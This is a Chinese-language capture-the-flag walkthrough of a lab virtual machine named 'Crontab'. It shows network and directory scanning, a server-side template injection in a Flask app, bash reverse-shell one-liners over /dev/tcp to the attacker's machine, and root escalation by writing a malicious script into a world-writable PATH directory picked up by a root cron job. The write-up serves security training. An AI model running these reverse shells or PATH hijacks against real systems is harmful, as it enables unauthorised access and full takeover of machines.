信息收集

cmd

1┌──(root㉿kali)-[~]2└─# arp-scan -l | grep PCS3192.168.5.114   08:00:27:8f:a7:4b       PCS Systemtechnik GmbH4                                                                                                                            5┌──(root㉿kali)-[~]6└─# IP=192.168.5.1147

cmd

1┌──(root㉿kali)-[~]2└─# nmap -sV -sC -A $IP -Pn3Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-09 09:14 EDT4Nmap scan report for Crontab.lan (192.168.5.114)5Host is up (0.0017s latency).6Not shown: 997 closed tcp ports (reset)7PORT     STATE SERVICE VERSION822/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)9| ssh-hostkey: 10|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)11|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)12|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)1380/tcp   open  http    Apache httpd 2.4.62 ((Debian))14|_http-server-header: Apache/2.4.62 (Debian)15|_http-title: Site doesn't have a title (text/html).165000/tcp open  http    Werkzeug httpd 3.1.3 (Python 3.9.2)17|_http-server-header: Werkzeug/3.1.3 Python/3.9.218|_http-title: Site doesn't have a title (text/html; charset=utf-8).19MAC Address: 08:00:27:8F:A7:4B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)20Device type: general purpose|router21Running: Linux 4.X|5.X, MikroTik RouterOS 7.X22OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.323OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)24Network Distance: 1 hop25Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel26 27TRACEROUTE28HOP RTT     ADDRESS291   1.71 ms Crontab.lan (192.168.5.114)30 31OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .32Nmap done: 1 IP address (1 host up) scanned in 8.25 seconds

目录扫描

cmd

1┌──(root㉿kali)-[~]2└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml3===============================================================4Gobuster v3.65by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)6===============================================================7[+] Url:                     http://192.168.5.1148[+] Method:                  GET9[+] Threads:                 1010[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt11[+] Negative Status codes:   40412[+] User Agent:              gobuster/3.613[+] Extensions:              php,html,tar,php3,txt,bk,bak,zip,gz,shtml14[+] Timeout:                 10s15===============================================================16Starting gobuster in directory enumeration mode17===============================================================18/.html                (Status: 403) [Size: 278]19/index.html           (Status: 200) [Size: 6]20/.php                 (Status: 403) [Size: 278]21/.php                 (Status: 403) [Size: 278]22/.html                (Status: 403) [Size: 278]23/server-status        (Status: 403) [Size: 278]24Progress: 2426160 / 2426171 (100.00%)25===============================================================26Finished27===============================================================

没扫出来什么，那就扫一下5000 端口

cmd

1┌──(root㉿kali)-[~]2└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP:5000 -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml3===============================================================4Gobuster v3.65by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)6===============================================================7[+] Url:                     http://192.168.5.114:50008[+] Method:                  GET9[+] Threads:                 1010[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt11[+] Negative Status codes:   40412[+] User Agent:              gobuster/3.613[+] Extensions:              gz,shtml,txt,html,bk,bak,zip,tar,php,php314[+] Timeout:                 10s15===============================================================16Starting gobuster in directory enumeration mode17===============================================================18/home                 (Status: 200) [Size: 179]19/library              (Status: 200) [Size: 194]20/console              (Status: 400) [Size: 167]21Progress: 491462 / 2426171 (20.26%)^C22[!] Keyboard interrupt detected, terminating.23Progress: 491477 / 2426171 (20.26%)24===============================================================25Finished26===============================================================

看看这两个路径下是啥

cmd

1┌──(root㉿kali)-[~]2└─# curl http://$IP:5000/home                                        3这种魔法叫ssti4破解这种魔法的魔法阵为touhou5<br>6在有施加ssti魔法的地方 启动魔法阵并且在魔法阵中输入魔法咒语就能直接读取书啦DAZE                                                                                                                            7┌──(root㉿kali)-[~]8└─# curl http://$IP:5000/library9<!DOCTYPE html>10<html>11<html lang="en">12<head>13    <meta charset="UTF-8">14 15</head>16 17<body>18        <p1>这次Marisa应该偷不到书了吧</p1>19        <br>20        <br>21        <img src="/static/p.jpg">22 23</body>24</html>                                                                                                     25 26┌──(root㉿kali)-[~]27└─# curl -G "http://192.168.5.114:5000/library" --data-urlencode "touhou={{7*7}}"28<!DOCTYPE html>29<html>30<html lang="en">31<head>32    <meta charset="UTF-8">33 34</head>35 36<body>37        <p1>你在干神魔？</p1>38        <br>39        <br>40        <img src="/static/s.png">41 42</body>43</html>

拿 fenjing 梭一下

text

1flag{marisa marisa-master spark}

获取交互式 Shell

kali 监听

cmd

1nc -lnvp 4444

拿到反弹 shell

text

1bash -c 'bash -i >& /dev/tcp/192.168.5.153/4444 0>&1'

稳定 shell

text

1Ctrl + Z2stty raw -echo; fg3python3 -c 'import pty; pty.spawn("/bin/bash")'4stty rows 27 cols 124 (这里的终端尺寸要新开一个终端运行stty size查询)5reset xterm6export TERM=xterm7export SHELL=/bin/bash

提权

根据靶机名称可以猜到要看 crontab

cmd

1marisa@Crontab:~$ cat /etc/crontab2# /etc/crontab: system-wide crontab3# Unlike any other crontab you don't have to run the `crontab'4# command to install the new version when you edit this file5# and files in /etc/cron.d. These files also have username fields,6# that none of the other crontabs do.7 8SHELL=/bin/sh9PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin10 11# Example of job definition:12# .---------------- minute (0 - 59)13# |  .------------- hour (0 - 23)14# |  |  .---------- day of month (1 - 31)15# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...16# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat17# |  |  |  |  |18# *  *  *  *  * user-name command to be executed1917 *    * * *   root    cd / && run-parts --report /etc/cron.hourly2025 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )2147 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )2252 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )23#24* * * * * root master_spark

注意到 master_spark 是以 root 权限执行的，且没有使用绝对路径。当 Linux 执行一个没有绝对路径的命令时会去 PATH 环境变量指定的目录里找这个命令，从左到右依次查找。

这意味着，当 root 每分钟执行 master_spark 时，系统会按顺序检查以下目录是否存在一个名为 master_spark 的可执行文件：

/usr/local/sbin
/usr/local/bin
/sbin
/bin
/usr/sbin
/usr/bin

因此考虑 PATH 劫持提权

检查 PATH 列表里的目录时发现：

cmd

1marisa@Crontab:~$ ls -ld /usr/local/sbin2drwxrwxrwx 2 root root 4096 Sep  8 03:39 /usr/local/sbin

最后一个 rwx 表示其他任何人 (包括 marisa 用户) 都拥有对这个目录的读、写、执行权限

再开一个终端监听 4445 端口

cmd

1nc -lnvp 4445

在目标机的 marisa Shell 中创建恶意脚本：

text

1marisa@Crontab:~$ cd /usr/local/sbin2marisa@Crontab:/usr/local/sbin$ echo "bash -c 'bash -i >& /dev/tcp/192.168.5.153/4445 0>&1'" > master_spark3marisa@Crontab:/usr/local/sbin$ chmod +x master_spark

等一会就连上了

text

1flag{touhou sai gao}